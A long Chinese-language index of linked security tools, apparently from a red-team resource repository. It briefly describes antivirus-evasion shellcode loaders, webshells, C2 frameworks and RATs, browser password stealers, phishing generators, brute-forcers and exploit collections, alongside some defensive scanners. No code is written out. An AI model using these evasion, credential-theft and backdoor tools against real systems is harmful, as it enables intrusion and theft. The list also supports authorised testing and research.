[【Android脱壳】Youpk-又一款基于ART的主动调用的脱壳机](https://github.com/Youlor/Youpk) - [【webshell免杀】php免杀D盾webshell生成工具](https://github.com/pureqh/webshell) - [Steganographer-一款能够帮助你在图片中隐藏文件或数据的Python隐写工具](https://github.com/priyansh-anand/steganographer) - [AV_Evasion_Tool:掩日 - 免杀执行器生成工具](https://github.com/1y0n/AV_Evasion_Tool) - [GODNSLOG-河马师傅(河马webshell检测作者)基于go语言开发的一款DNSLOG工具,支持docker一键部署](https://github.com/chennqqi/godnslog) - [SweetPotato_Cobalt Strike-修改的SweetPotato,使之可以用于CobaltStrike v4.0](https://github.com/Tycx2ry/SweetPotato_CS) - [ServerScan-一款使用Golang开发的高并发网络扫描、服务探测工具](https://github.com/Adminisme/ServerScan) - [ShellcodeLoader-将shellcode用rsa加密并动态编译exe,自带几种反沙箱技术](https://github.com/Hzllaga/ShellcodeLoader) - [shellcodeloader-Windows平台的shellcode免杀加载器](https://github.com/knownsec/shellcodeloader) - [Go_Bypass:一个golang 编写的免杀生成器模板,目前可以过国内主流杀毒](https://github.com/Arks7/Go_Bypass) - [FourEye-重明-又一款基于python开发的对shellcode和exe文件免杀的工具](https://github.com/lengjibo/FourEye) - [Invoke-CustomKatz.ps1-bypass AMSI 的Mimikatz PS脚本](./tools/Invoke-CustomKatz.ps1)-[原文地址](https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/)-[原gits链接](https://gist.github.com/S3cur3Th1sSh1t/b33b978ea62a4b0f6ef545f1378512a6) - [SimpleShellcodeInjector-shellcode加载器](https://github.com/DimopoulosElias/SimpleShellcodeInjector) - [Arsenal-Cobalt Strike直接生成payload插件免杀360和火绒](https://github.com/Cliov/Arsenal) - [ShellCodeFramework-【免杀框架】](https://github.com/mai1zhi2/ShellCodeFramework) - [cool:Golang Gin 框架写的免杀平台](https://github.com/Ed1s0nZ/cool) - [abuse-ssl-bypass-waf-使用不同的ssl加密方式来寻找防火墙不支持但服务器支持的加密方式来绕过waf](https://github.com/LandGrey/abuse-ssl-bypass-waf) - [CrossC2 framework - 生成CobaltStrike的跨平台beacon](https://github.com/Mr-xn/CrossC2) - [csbruter-爆破Cobalt Strike的服务端密码](https://github.com/ryanohoro/csbruter) - [yjdirscan-御剑目录扫描专业版【仅支持windows】](https://github.com/foryujian/yjdirscan) - [Vmware Vcenter 任意文件读取批量检测](./books/Vmware%20Vcenter%20任意文件读取批量检测.md) - [CVE-2020-16898检测工具](https://github.com/advanced-threat-research/CVE-2020-16898) - [Nette框架远程代码执行(CVE-2020-15227)](https://github.com/hu4wufu/CVE-2020-15227) - [flask-session-cookie-manager-Flask Session Cookie Decoder/Encoder(flask框架的cookie或session编码/解码工具)](https://github.com/noraj/flask-session-cookie-manager) - [【钓鱼】Mail-Probe-邮箱探针后台管理系统](https://github.com/r00tSe7en/Mail-Probe) - [momo-code-sec-inspector-java-IDEA静态代码安全审计及漏洞一键修复插件](https://github.com/momosecurity/momo-code-sec-inspector-java) - [pyrdp-RDP中间人攻击工具](https://github.com/GoSecure/pyrdp) - [【端口爆破】PortBrute-一款跨平台小巧的端口爆破工具,支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD](https://github.com/awake1t/PortBrute) - [【端口爆破】x-crack-一款FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB弱口令爆破工具](https://github.com/netxfly/x-crack) - [【威胁日志分析】DeepBlueCLI-通过Windows事件日志来搜寻威胁的powershell模块](https://github.com/sans-blue-team/DeepBlueCLI) - [Pentest-and-Development-Tips-三好学生大佬出品的有关渗透测试和开发的小技巧](https://github.com/3gstudent/Pentest-and-Development-Tips) - [【免杀】ImgLoaderShellCode-将shellcode注入bmp图片文件](https://github.com/sv3nbeast/ImgLoaderShellCode)-[配合这个更佳](https://www.svenbeast.com/post/xue-xi-tu-pian-yin-xie-shellcode-jin-xing-yuan-cheng-jia-zai-guo-av/) - [【免杀】DLL 代理转发与维权](./books/%E3%80%90%E5%85%8D%E6%9D%80%E3%80%91DLL%20%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91%E4%B8%8E%E7%BB%B4%E6%9D%83.pdf)-[原文地址](https://mp.weixin.qq.com/s/zUXrNsf9IsZWocrb7z3i1Q) - [【免杀】使用nim语言进行shellcode加载](https://github.com/M-Kings/BypassAv-web) - [【免杀】bypassAV:借助Win-PS2EXE项目编写cna脚本方便快速生成免杀可执行文件](https://github.com/cseroad/bypassAV) - [LangNetworkTopologys-快速进行内网资产扫描,支持端口扫描,指纹识别,网站探测,结果支持图表展示](https://github.com/LangziFun/LangNetworkTopologys) - [weblogic_exploit-weblogic漏洞利用工具【包括了weblogic常见高危漏洞的利用】](https://github.com/21superman/weblogic_exploit) - [rsync_weakpass.py-rsync弱口令爆破脚本](https://github.com/hi-unc1e/some_scripts/blob/master/EXPs/rsync_weakpass.py) - [Findomain-跨平台的子域名爆破工具](https://github.com/Findomain/Findomain) - [wfuzz-web应用fuzz工具kali自带工具之一](https://github.com/xmendez/wfuzz) - [ffuf-基于go开发的快速fuzz工具](https://github.com/ffuf/ffuf) - [linglong-一款甲方资产巡航扫描系统,系统定位是发现资产,进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示](https://github.com/awake1t/linglong) - [fscan-一键大保健(支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等)](https://github.com/shadow1ng/fscan) - [anti-honeypot-一款可以检测WEB蜜罐并阻断请求的Chrome插件](https://github.com/cnrstar/anti-honeypot) - [myscan-又一款被动扫描工具](https://github.com/amcai/myscan) - [360SafeBrowsergetpass-一键辅助抓取360安全浏览器密码的Cobalt Strike脚本](https://github.com/hayasec/360SafeBrowsergetpass) - [BrowserView-还原浏览器(支持国产主流浏览器)密码/历史记录/收藏夹/cookie](./tools/BrowserView.exe)-[原地址](http://www.liulanqicode.com/browserview.htm) - [HackBrowserData-是一个解密浏览器数据(密码|历史记录|Cookie|书签 | 信用卡 | 下载记录)的导出工具,支持全平台主流浏览器](https://github.com/moonD4rk/HackBrowserData) - [OffensiveNim-简称Nim的跨平台shellcode加载执行器](https://github.com/byt3bl33d3r/OffensiveNim) - [gshark-GitHub敏感信息扫描收集管理工具](https://github.com/madneal/gshark) - [domainNamePredictor-一个简单的现代化公司域名使用规律预测及生成工具](https://github.com/LandGrey/domainNamePredictor) - [r0capture-安卓应用层抓包通杀脚本](https://github.com/r0ysue/r0capture) - [【免杀】py2exe-将python脚本转换为单文件版可执行的exe文件](https://github.com/py2exe/py2exe) - [Kunlun-Mirror 专注于安全研究员使用的代码审计辅助工具](https://github.com/LoRexxar/Kunlun-M) - [JsLoader-js免杀shellcode,绕过杀毒添加自启](https://github.com/Hzllaga/JsLoader) - [NoMSBuild-MSBuild without MSbuild.exe](https://github.com/rvrsh3ll/NoMSBuild) - [thinkphp-RCE-POC-Collection-thinkphp v5.x 远程代码执行漏洞-POC集合](https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection) - [possessor-【过杀软行为检测】原理:在win10下创建一个第二桌面,模拟用户执行命令](https://github.com/gnxbr/Fully-Undetectable-Techniques/tree/main/possessor) - [MemProcFS-The Memory Process File System](https://github.com/ufrisk/MemProcFS) - [vulmap-Web漏洞扫描和验证工具,可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描,并且具备漏洞利用功能](https://github.com/zhzyker/vulmap) - [Ary 是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透](https://github.com/TeraSecTeam/ary) - [AKtools-Java版的aliyun-accesskey-Tools](https://github.com/Moon3r/AKtools)|[aliyun-accesskey-Tools-此工具用于查询ALIYUN_ACCESSKEY的主机,并且远程执行命令](https://github.com/mrknow001/aliyun-accesskey-Tools)|[alicloud-tools:阿里云ECS、策略组辅助小工具](https://github.com/iiiusky/alicloud-tools) - [MDAT-一款用于数据库攻击的利用工具,集合了多种主流的数据库类型](https://github.com/SafeGroceryStore/MDAT) - [sqlmap-gtk-sqlmap的GUI界面实现](https://github.com/needle-wang/sqlmap-gtk) - [Viper-msf(metasploit-framework)图形界面](https://github.com/FunnyWolf/Viper) - [Web-Fuzzing-Box - Web 模糊测试字典与一些Payloads,主要包含:弱口令暴力破解、目录以及文件枚举、Web漏洞](https://github.com/gh0stkey/Web-Fuzzing-Box) - [emp3r0r-Linux后渗透框架](https://github.com/jm33-m0/emp3r0r) - [dnstunnel-一款多会话的二进制DNS隧道远控](https://github.com/bigBestWay/dnstunnel) - [CVE-2020-17519-Apache Flink 目录遍历漏洞批量检测](https://github.com/B1anda0/CVE-2020-17519) - [Internal-Monologue-通过 SSPI 调⽤ NTLM 身份验证,通过协商使⽤预定义 challenge 降级为 NetNTLMv1,获取到 NetNTLMv1 hash](https://github.com/eladshamir/Internal-Monologue) - [domainTools-内网域渗透小工具](https://github.com/SkewwG/domainTools) - [HackTools(如当)-红队浏览器插件](https://github.com/s7ckTeam/HackTools) - [CVE-2020-36179-Jackson-databind SSRF&RCE](https://github.com/Al1ex/CVE-2020-36179) - [leaky-paths-一份有关major web CVEs, known juicy APIs, misconfigurations这类的特别应用路径字典收集](https://github.com/ayoubfathi/leaky-paths) - [QuJing(曲境)-曲境是一个xposed模块,可实现在PC浏览器上动态监控(hook)函数调用和查看堆栈信息,及反射调用(invoke)等功能](https://github.com/Mocha-L/QuJing) - [r0tracer-安卓Java层多功能追踪脚本](https://github.com/r0ysue/r0tracer) - [TFirewall-防火墙出网探测工具,内网穿透型socks5代理](https://github.com/FunnyWolf/TFirewall) - [`Cooolis-ms`是一个包含了Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injection的代码执行工具,它的定位在于能够在静态查杀上规避一些我们将要执行且含有特征的代码,帮助红队人员更方便快捷的从Web容器环境切换到C2环境进一步进行工作。](https://github.com/Rvn0xsy/Cooolis-ms) - [GScan-为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源](https://github.com/grayddq/GScan) - [Kscan-一款轻量级的资产发现工具,可针对IP/IP段或资产列表进行端口扫描以及TCP指纹识别和Banner抓取,在不发送更多的数据包的情况下尽可能的获取端口更多信息](https://github.com/lcvvvv/kscan) - [【字典】Dictionary-Of-Pentesting-认证类、文件路径类、端口类、域名类、无线类、正则类](https://github.com/insightglacier/Dictionary-Of-Pentesting) - [【免杀框架】*Veil*-Evasion是一个用python写的*免杀*框架](https://github.com/Veil-Framework/Veil) - [Shellcoding-shellcode生成+shellcode混淆](https://github.com/Mr-Un1k0d3r/Shellcoding) - [【免杀】bypassAV-条件触发式远控](https://github.com/pureqh/bypassAV) - [SystemToken-通过遍历所有进程来寻找一个以SYSTEM权限运行且所有者为 Administrators的进程后,以当前token新启一个SYSTEM权限的shell](https://github.com/yusufqk/SystemToken) - [通达OA综合利用工具_圈子社区专版](./tools/通达OA综合利用工具_圈子社区专版.jar) - [IoT-vulhub-IoT 固件漏洞复现环境](https://github.com/firmianay/IoT-vulhub) - [RedisWriteFile-通过 Redis 主从写出无损文件](https://github.com/r35tart/RedisWriteFile) - [AWVS-13-SCAN-PLUS_一个基于Acunetix Web Vulnerability Scanner 13 (AWVS13)扫描引擎的辅助软件](https://github.com/x364e3ab6/AWVS-13-SCAN-PLUS) - [sonar-java_java代码质量检查和安全性测试](https://github.com/SonarSource/sonar-java) - [CSS-Exchange_微软自家出品的Exchange server检查工具](https://github.com/microsoft/CSS-Exchange) - [frpModify-修改frp支持域前置与配置文件自删除](https://github.com/uknowsec/frpModify)|[FrpProPlugin-frp0.33修改版,过流量检测,免杀,支持加载远程配置文件可用于cs直接使用的插件](https://github.com/mstxq17/FrpProPlugin) - [Vulfocus-一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用](https://github.com/fofapro/vulfocus) - [vulnReport-安服自动化脚本:包括 Nessus、天境主机漏洞扫描6.0、APPscan、awvs等漏洞报告的整理,Google翻译等](https://github.com/wysec2020/vulnReport) - [.NETWebShell-动态编译实现任意命令执行,Windows Defender 免杀](https://github.com/Ivan1ee/.NETWebShell) - [NetDLLSpy-.NET后渗透下的权限维持,附下载DLL](https://github.com/Ivan1ee/NetDLLSpy) - [DuckMemoryScan-一个简单寻找包括不限于iis劫持,无文件木马,shellcode免杀后门的工具](https://github.com/huoji120/DuckMemoryScan) - [PocList-jar单文件版的各种poc利用工具](https://github.com/Yang0615777/PocList) - [swagger-hack:自动化爬取并自动测试所有swagger-ui.html显示的接口](https://github.com/jayus0821/swagger-hack)|[Swagger API Exploit-一个 Swagger REST API 信息泄露利用工具](https://github.com/lijiejie/swagger-exp) - [weblogic-framework:weblogic漏洞检测框架](https://github.com/0nise/weblogic-framework) - [Finger-web指纹识别工具『质量根据规则库』](https://github.com/EASY233/Finger) - [Sunflower_get_Password-一款针对向日葵的识别码和验证码提取工具](https://github.com/wafinfo/Sunflower_get_Password) - [LaZagne:一键抓取目标机器上的所有明文密码(有点类似于mimikatz)](https://github.com/AlessandroZ/LaZagne) - [gitrecon-从gitlab或者github的提交记录和个人主页提取个人信息,如邮箱、公司、地址、twitter、blog等等](https://github.com/GONZOsint/gitrecon) - [SharpClipboard:用c#写的获取剪贴板内容的工具,也可用于cobalt strike中使用](https://github.com/slyd0g/SharpClipboard) - [Limelighter-应用程序伪造签名](https://github.com/Tylous/Limelighter) - [aLIEz-java杀内存马工具](https://github.com/r00t4dm/aLIEz) - [weblogic_memshell-适用于weblogic的无shell的内存马](https://github.com/keven1z/weblogic_memshell) - [FofaSpider-Fofa爬虫支持高级查询语句批量爬取](https://github.com/KpLi0rn/FofaSpider) - [SpringBoot 持久化 WebShell](https://github.com/threedr3am/ZhouYu) - [nuclei引擎的exp库](https://github.com/projectdiscovery/nuclei-templates) - [smarGate-内网穿透,c++实现,无需公网IP,小巧,易用,快速,安全,最好的多链路聚合(p2p+proxy)模式](https://github.com/lazy-luo/smarGate) - [200个shiro key 来自lscteam的分享](./shiro_keys_200.txt) - [shiro-exploit-Shiro反序列化利用工具,支持新版本(AES-GCM)Shiro的key爆破,配合ysoserial,生成回显Payload](https://github.com/Ares-X/shiro-exploit)|[备份下载](./tools/shiro_tool.zip) - [fastjson_rce_tool-fastjson命令执行自动化利用工具, remote code execute,JNDI服务利用工具 RMI/LDAP](https://github.com/wyzxxz/fastjson_rce_tool)|[备份下载](./tools/fastjson_tool.jar) - [Eeyes(棱眼)-快速筛选真实IP并整理为C段](https://github.com/EdgeSecurityTeam/Eeyes) - [EHole(棱洞)2.0 重构版-红队重点攻击系统指纹探测工具](https://github.com/EdgeSecurityTeam/EHole) - [ListRDPConnections-C# 读取本机对外RDP连接记录和其他主机对该主机的连接记录,从而在内网渗透中获取更多可通内网网段信息以及定位运维管理人员主机](https://github.com/Heart-Sky/ListRDPConnections) - [PandaSniper-熊猫狙击手的Linux C2框架demo](https://github.com/QAX-A-Team/PandaSniper) - [CaptfEncoder是一款可扩展跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、非对称加密、特殊编码、杂项等工具,并聚合各类在线工具](https://github.com/guyoung/CaptfEncoder) - [Evasor - 自动化查找可执行文件的安全评估工具](https://github.com/cyberark/Evasor) - [jenkins-attack-framework-Jenkins攻击框架](https://github.com/Accenture/jenkins-attack-framework) - [MicroBackdoor-适用于Windows目标的小型便捷C2工具](https://github.com/Cr4sh/MicroBackdoor) - [puredns-子域爆破工具](https://github.com/d3mondev/puredns) - [dnsub:子域名扫描工具](https://github.com/yunxu1/dnsub) - [DcRat-C#编写的简易远控工具](https://github.com/qwqdanchun/DcRat) - [PhishingLnk-windows钓鱼快捷方式link生成工具](https://github.com/qwqdanchun/PhishingLnk) - [paragon-Red Team互动平台,旨在统一简单UI后的进攻工具](https://github.com/KCarretto/paragon) - [vaf-非常先进的Web Fuzzer工具](https://github.com/d4rckh/vaf) - [nginxpwner-寻找常见Nginx错误配置和漏洞的简单工具](https://github.com/stark0de/nginxpwner) - [pentest_lab:使用docker-compose搭建常见的几种靶机系统](https://github.com/oliverwiegers/pentest_lab) - [SharpWebServer:搭建HTTP和WebDAV服务器来捕获Net-NTLM哈希](https://github.com/mgeeky/SharpWebServer) - [interactsh:用于带外数据提取的开源解决方案,一种用于检测导致外部交互的错误的工具,例如:Blind SQLi,Blind CMDi,SSRF等](https://github.com/projectdiscovery/interactsh) - [Autoscanner-一款自动化扫描器,其功能主要是遍历所有子域名、及遍历主机所有端口寻找出所有http服务,并使用集成的工具(oneforall、masscan、nmap、crawlergo、dirsearch、xray、awvs、whatweb等)进行扫描,最后集成扫描报告](https://github.com/zongdeiqianxing/Autoscanner) - [Z1-AggressorScripts:适用于Cobalt Strike 3.x & 4.x 的插件](https://github.com/z1un/Z1-AggressorScripts) - [TongdaOA-通达OA 11.7 任意用户登录](https://github.com/z1un/TongdaOA) - [charlotte:又一款免杀 C++ Shellcode加载器](https://github.com/9emin1/charlotte) - [Bytecode Viewer是一个高级的轻量级Java字节码查看器](https://github.com/Konloch/bytecode-viewer) - [go-crack:go 语言写的弱口令爆破工具](https://github.com/niudaii/go-crack) - [Metarget-一个脆弱基础设施自动化构建框架,主要用于快速、自动化搭建从简单到复杂的脆弱云原生靶机环境](https://github.com/brant-ruan/metarget) - [NessusToReport-nessus扫描报告自动化生成工具](https://github.com/Hypdncy/NessusToReport) - [cloudflare-bypass:使用Cloudflare Workers来绕过Cloudflare 的机器人验证](https://github.com/jychp/cloudflare-bypass) - [安全测试工具集:在学习和渗透测试过程中自己写的一些小脚本、小工具和一些常用字典、木马](https://github.com/echohun/tools) - [php_code_analysis:python编写的代码审计脚本(关键词匹配,类似于seay代码审计)](https://github.com/kira2040k/php_code_analysis) - [schemeflood:基于Schemeflood技术实现对已安装的软件进行探测](https://github.com/TomAPU/schemeflood) - [pocscan:指纹识别后,进行漏洞精准扫描](https://github.com/DSO-Lab/pocscan) - [DNSLog-Platform-Golang:一键搭建Dnslog平台的golang版本](https://github.com/yumusb/DNSLog-Platform-Golang) - [WinAPI-Tricks:恶意软件使用或滥用的各种 WINAPI 技巧/功能的集合](https://github.com/vxunderground/WinAPI-Tricks) - [go_meterpreter:Golang实现的x86下的Meterpreter reverse tcp](https://github.com/insightglacier/go_meterpreter) - [sharpwmi:一个基于rpc的横向移动工具,具有上传文件和执行命令功能](https://github.com/QAX-A-Team/sharpwmi) - [RedWarden:灵活的配置C2反向代理来隐藏自己的CS](https://github.com/mgeeky/RedWarden) - [MemoryShellLearn:java内存马的学习记录以及demo](https://github.com/bitterzzZZ/MemoryShellLearn) - [图形化漏洞利用Demo-JavaFX版:ExpDemo-JavaFX ](https://github.com/yhy0/ExpDemo-JavaFX) - [Security_Product:开源安全产品源码](https://github.com/birdhan/Security_Product) - [flask_memory_shell:Flask 内存马](https://github.com/iceyhexman/flask_memory_shell) - [SourceDetector:用于发现源码文件(*.map)的chrome插件](https://github.com/SunHuawei/SourceDetector) - [CrossNet-Beta:红队行动中利用白利用、免杀、自动判断网络环境生成钓鱼可执行文件](https://github.com/dr0op/CrossNet-Beta) - [slopShell:一款功能强大的PHP Webshell](https://github.com/oldkingcone/slopShell) - [rustcat:netcat的代替品](https://github.com/robiot/rustcat) - [Backstab:通过加载恶意的驱动文件干掉杀软](https://github.com/Yaxser/Backstab) - [ncDecode:用友nc数据库密码解密工具](https://github.com/jas502n/ncDecode) - [JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具](https://github.com/Threezh1/JSFinder)|[JSFinder的油猴脚本版本](https://github.com/Threezh1/Deconstruct/tree/main/DevTools_JSFinder) - [Packer-Fuzzer:一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具](https://github.com/rtcatc/Packer-Fuzzer) - [post-hub:内网仓库:远控、提权、免杀、代理、横向、清理](https://github.com/ybdt/post-hub) - [FridaHooker:Android 图形化Frida管理器](https://github.com/wrlu/FridaHooker) - [firefox浏览器密码dump工具之.net版](https://github.com/gourk/FirePwd.Net)|[firepwd:firefox密码dump解密工具python版](https://github.com/lclevy/firepwd)|[FireFox-Thief:又一个解密firefox浏览器密码的工具-windows版本](https://github.com/LimerBoy/FireFox-Thief)|[chrome>80的密码解密提取工具-windows版本](https://github.com/LimerBoy/Adamantium-Thief) - [Noah-golang版本的批量高速获取单IP 或 C段 title 工具『可指定端口和线程,支持文本批量的单IP或IP段』](https://github.com/ody5sey/Noah) - [bmc-tools:从RDP连接的缓存文件中还原图片](https://github.com/ANSSI-FR/bmc-tools)|[RdpCacheStitcher:协助拼图还原RDP缓存图像的工具,和前面的是好搭档](https://github.com/BSI-Bund/RdpCacheStitcher) - [phpshell:php大马|php一句话](https://github.com/weepsafe/phpshell) - [goShellCodeByPassVT:通过线程注入及-race参数免杀全部VT](https://github.com/fcre1938/goShellCodeByPassVT) - [NGLite-基于区块链网络的匿名跨平台远控程序](https://github.com/Maka8ka/NGLite)-[相关文章](./books/NGLite-基于区块链网络的匿名跨平台远控程序%20_%20Maka8ka's%20Garden.pdf) - [SocksOverRDP:通过RDP连接开一个socks代理](https://github.com/nccgroup/SocksOverRDP)-[SharpRDP:通过RDP执行命令](https://github.com/0xthirteen/SharpRDP)-[rdpcmd:通过RDP执行命令](https://github.com/kost/rdpcmd) - [wpscvn:供渗透测试人员、网站所有者测试他们的网站是否有一些易受攻击的插件或主题的工具](https://github.com/sabersebri/wpscvn) - [xjar:Spring Boot JAR 安全加密运行工具,支持的原生JAR](https://github.com/core-lib/xjar) - [process_ghosting:Windows上通过篡改内存中的可执行文件映射达到绕过杀软的行为查杀](https://github.com/hasherezade/process_ghosting) - [kali-whoami: 隐私工具, 旨在让您在 Kali Linux 上保持最高级别的匿名性](https://github.com/omer-dogan/kali-whoami) - [goon:一款基于golang开发的扫描及爆破工具](https://github.com/i11us0ry/goon) - [OXID:通过windows的DCOM接口进行网卡进行信息枚举,无需认证,只要目标的135端口开放即可获得信息](https://github.com/canc3s/OXID) - [gnc:golang 版本的 nc ,支持平时使用的大部分功能,并增加了流量rc4加密](https://github.com/canc3s/gnc) - [post-attack:内网渗透:远控、免杀、代理、横向,专注于打点后的内网渗透中涉及到的各类技术](https://github.com/ybdt/post-attack) - [jndiat:专为测试Weblogic T3协议安全的工具](https://github.com/quentinhardy/jndiat) - [RabR:Redis-Attack By Replication (通过主从复制攻击Redis)](https://github.com/0671/RabR) - [hysteria:恶劣网络环境下的双边加速工具](https://github.com/HyNetwork/hysteria) - [Cobaltstrike_4.3源码](https://github.com/nice0e3/Cobaltstrike_4.3_Source) - [Beaconator:CS becaon 生成](https://github.com/capt-meelo/Beaconator) - [MicrosoftWontFixList-微软的设计缺陷导致的提权漏洞列表](https://github.com/cfalta/MicrosoftWontFixList) - [unfuck: Python 2.7 字节码反混淆器](https://github.com/landaire/unfuck) - [Mimikore: .NET 5 单文件应用程序. Mimikatz 或任何 Base64 PE 加载程序](https://github.com/secdev-01/Mimikore) - [kinject: 内核Shellcode注入器](https://github.com/w1u0u1/kinject) - [Tiny-XSS-Payloads:超级精简的XSS payload](https://github.com/terjanq/Tiny-XSS-Payloads) - [domhttpx:用python开发的 google搜索 工具](https://github.com/naufalardhani/domhttpx) - [NSE-scripts:nmap检测脚本(CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473)](https://github.com/psc4re/NSE-scripts) - [vscan:开源、轻量、快速、跨平台 的红队(redteam)外网打点扫描器,功能 端口扫描(port scan) 指纹识别(fingerprint) nday检测(nday check) 智能爆破 (admin brute) 敏感文件扫描(file fuzz)](https://github.com/veo/vscan) - [evilzip:制作恶意的zip压缩包工具](https://github.com/TheKingOfDuck/evilzip) - [oFx-漏洞批量扫描框架,0Day/1Day全网概念验证](https://github.com/bigblackhat/oFx) - [shiro rememberMe 在线加解密工具](https://github.com/M-Kings/WEB-shiro_rememberMe_encode_decode) - [tp_scan:thinkphp 一键化扫描工具 优化版](https://github.com/cqkenuo/tp_scan) - [apitool:Windows Api调用【添加用户,添加用户到组,更改用户密码,删除用户,列出计算机上所有用户,列出计算机上所有组】](https://github.com/M-Kings/apitool) - [spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks) - [Frog-Fp:批量深度指纹识别框架](https://github.com/timwhitez/Frog-Fp) - [AlliN:python单文件,无依赖的快速打点的综合工具](https://github.com/P1-Team/AlliN) - [Troy:更高级的免杀webshell生成工具](https://github.com/pureqh/Troy) - [aksk_tool:AK利用工具,阿里云/腾讯云 AccessKey AccessKeySecret,利用AK获取资源信息和操作资源,ECS/CVM操作,OSS/COS管理,RDS管理,域名管理,添加RAM账号等](https://github.com/wyzxxz/aksk_tool)-[备份下载](./tools/aksk_tool.zip) - [heapdump_tool:heapdump敏感信息查询工具,例如查找 spring heapdump中的密码明文,AK,SK等](https://github.com/wyzxxz/heapdump_tool)-[备份下载](./tools/heapdump_tool.jar) - [ShuiZe_0x727:水泽-信息收集自动化工具](https://github.com/0x727/ShuiZe_0x727) - [SharpBeacon:CobaltStrike Beacon written in .Net 4 用.net重写了stager及Beacon,其中包括正常上线、文件管理、进程管理、令牌管理、结合SysCall进行注入、原生端口转发、关ETW等一系列功能](https://github.com/mai1zhi2/SharpBeacon) - [RocB:Java代码审计IDEA插件 SAST](https://github.com/XianYanTechnology/RocB) - [sx:快速易用的现代化网络扫描工具](https://github.com/v-byte-cpu/sx) - [【内网】RestrictedAdmin:远程启用受限管理员模式](https://github.com/GhostPack/RestrictedAdmin) - [NewNtdllBypassInlineHook_CSharp:通过文件映射加载 ntdll.dll 的新副本以绕过 API 内联hook](https://github.com/Kara-4search/NewNtdllBypassInlineHook_CSharp) - [spp:简单强大的多协议双向代理工具 A simple and powerful proxy](https://github.com/esrrhs/spp) - [【免杀】AVByPass:一款Web在线自动免杀工具(利用 Python 反序列化免杀)](https://github.com/yhy0/AVByPass) - [【免杀】ZheTian:免杀shellcode加载框架](https://github.com/yqcs/ZheTian) - [LSTAR:CobaltStrike 综合后渗透插件](https://github.com/lintstar/LSTAR) - [SharpSQLTools:有了 sqlserver 权限后,可用来上传下载文件,xp_cmdshell与sp_oacreate执行命令回显和clr加载程序集执行相应操作](https://github.com/uknowsec/SharpSQLTools) - [spring-boot-webshell:但文件版 spring-boot webshell环境](https://github.com/durkworf/spring-boot-webshell)|[SpringBootWebshell:Springboot的一个webshell](https://github.com/fupinglee/SpringBootWebshell) - [java-object-searcher:java内存对象搜索辅助工具](https://github.com/c0ny1/java-object-searcher) - [GTFOBins:通过Linux 系统中错误的配置来提升权限](https://gtfobins.github.io/) - [QueenSono: 使用 ICMP 协议进行数据渗透](https://github.com/ariary/QueenSono) - [Pollenisator: 具有高度可定制工具的协作渗透测试工具](https://github.com/AlgoSecure/Pollenisator) - [arsenal:常用黑客程序的命令补全快速启动工具](https://github.com/Orange-Cyberdefense/arsenal) - [AllatoriCrack:破解 Java 混淆工具 Allatori](https://github.com/lqs1848/AllatoriCrack) - [CuiRi:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马](https://github.com/NyDubh3/CuiRi) - [Xjar_tips:Spring Boot JAR 安全加密运行工具, 同时支持的原生JAR](https://github.com/jas502n/Xjar_tips) - [druid_sessions:提取 Druid 的 session 工具](https://github.com/yuyan-sec/druid_sessions) - [xmap:快速网络扫描器, 专为执行互联网范围内的 IPv6 和IPv4 网络研究扫描而设计](https://github.com/idealeer/xmap) - [WAF-bypass-xss-payloads:一直更新的 bypass waf 的 XSS payload 仓库](https://github.com/Walidhossain010/WAF-bypass-xss-payloads) - [vshell:基于蚁剑控制台编写的rat,使用蚁剑远程控制主机](https://github.com/veo/vshell) - [CVE-2021-21985:VMware vCenter Server远程代码执行漏洞](https://github.com/testanull/Project_CVE-2021-21985_PoC)|[可回显的POC](https://github.com/r0ckysec/CVE-2021-21985) - [FuckAV:python写的一款免杀工具(shellcode加载器)BypassAV](https://github.com/iframepm/FuckAV) - [【免杀】avcleaner:通过分析抽象语法树的方式进行字符串混淆并重写系统调用来隐藏API函数的使用,使其绕过杀软的静态文件扫描和动态的API函数行为检测](https://github.com/scrt/avcleaner) - [cDogScan:又一款多服务口令爆破、内网常见服务未授权访问探测,端口扫描工具](https://github.com/fuzz7j/cDogScan) - [henggeFish:自动化批量发送钓鱼邮件](https://github.com/SkewwG/henggeFish) - [EXOCET-AV-Evasion:可绕过杀软的 Payload 投递工具](https://github.com/tanc7/EXOCET-AV-Evasion) - [DNSlog-GO:DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带WEB界面](https://github.com/lanyi1998/DNSlog-GO) - [SCFProxy:一个利用腾讯云函数服务做 HTTP 代理、SOCKS5 代理、反弹 shell、C2 域名隐藏的工具](https://github.com/shimmeris/SCFProxy) - [firezone:通过 web 界面来管理 wireguard ](https://github.com/firezone/firezone) - [Atlas:帮助你快速筛选测试能够绕过 waf 的 sqlmap tamper](https://github.com/m4ll0k/Atlas) - [cobaltstrike-bof-toolset:在cobaltstrike中使用的bof工具集,收集整理验证好用的bof](https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset) - [domainNamePredictor:一个简单的现代化公司域名使用规律预测及生成工具](https://github.com/LandGrey/domainNamePredictor) - [GoScan:采用Golang语言编写的一款分布式综合资产管理系统,适合红队、SRC等使用](https://github.com/CTF-MissFeng/GoScan) - [Finger:一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具](https://github.com/EASY233/Finger) - 